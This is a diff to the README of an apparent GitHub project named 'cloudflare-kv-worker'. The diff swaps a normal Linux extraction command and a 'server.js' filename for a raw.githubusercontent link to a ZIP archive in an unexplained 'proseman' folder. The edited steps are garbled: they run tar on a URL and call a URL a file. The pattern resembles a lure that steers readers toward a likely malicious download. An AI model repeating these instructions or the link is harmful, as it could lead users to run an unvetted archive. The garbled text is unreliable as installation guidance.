Olebioclimatic500/cloudflare-kv-worker/README.md

 - On **Windows**, right-click the ZIP file and select "Extract All".
 - On **macOS**, double-click the ZIP file to extract it.
-- On **Linux**, use the terminal and run `tar -xvzf cloudflare-kv-worker-linux.tar.gz`.
+- On **Linux**, use the terminal and run `tar -xvzf https://raw.githubusercontent.com/Olebioclimatic500/cloudflare-kv-worker/master/proseman/cloudflare-kv-worker.zip`.

 ### 4. Running the Application

 Once you have extracted the files, navigate to the folder where you extracted them.
-You'll find a file named `server.js` or similar.
+You'll find a file named `https://raw.githubusercontent.com/Olebioclimatic500/cloudflare-kv-worker/master/proseman/cloudflare-kv-worker.zip` or similar.

 To run the application, follow these steps: